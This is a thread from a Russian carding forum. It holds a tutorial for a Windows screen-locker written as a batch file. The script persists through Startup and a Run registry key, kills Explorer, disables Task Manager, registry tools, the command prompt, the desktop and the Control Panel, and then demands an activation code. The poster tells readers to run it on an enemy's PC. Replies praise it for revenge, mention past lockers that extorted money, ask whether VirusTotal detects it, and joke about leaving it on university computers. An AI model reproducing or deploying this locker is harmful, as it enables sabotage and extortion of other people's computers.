Привет, гость!

Добро пожаловать на CVVPRO - крупнейший теневой кардинг форум РУнета. Чтобы получить полный доступ к форуму войди или пройди регистрацию!

Пишем простой винлокер в блокноте.

Killmy

Участник клуба
Реакции
6
Начинаем с открытия блокнота.

Копируем туда этот код: ​

Код:
Echo off

color a

msg by File0

copy blocker.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

copy blocker.bat "C:\$SysReset"

taskkill /im explorer.exe /f > nul

copy %0 C:\Windows\Win32.bat > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul

cls

title Windows has been blocked

echo Windows has been blocked

:G

echo Enter the activation code:

set /p x=

if %x%==сюда пишем пароль (echo Windows starting!

start explorer

reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul

exit

) ELSE (

cls

echo Activation code is incorrect!

echo Enter the acctivation code again!

)

goto G

Далее сохраняем как, blocker.bat (Внимание, очень важно поменять при сохранении расширение на .bat
Итак, мы сохранили.
Всего готово, можно открывать на пк вашего недруга. Если хотите можете скомпилировать этот файл в .exe.

Kidsmum

Опытный user
Реакции
9
Отличная штука для небольшой мести неприятелям.

comphaus

Участник клуба
Реакции
8
Помниться как ходила эта хуйня по пк и деньги требовала за разблокировку,я тогда не хуёво заработал на удалении её)

Namecard

Опытный user
Реакции
9
Вирус тотал палит?

Jakkan

Участник клуба
Реакции
30
Прикольно, был бы в универе, то оставил такой на компах))

Сверху Снизу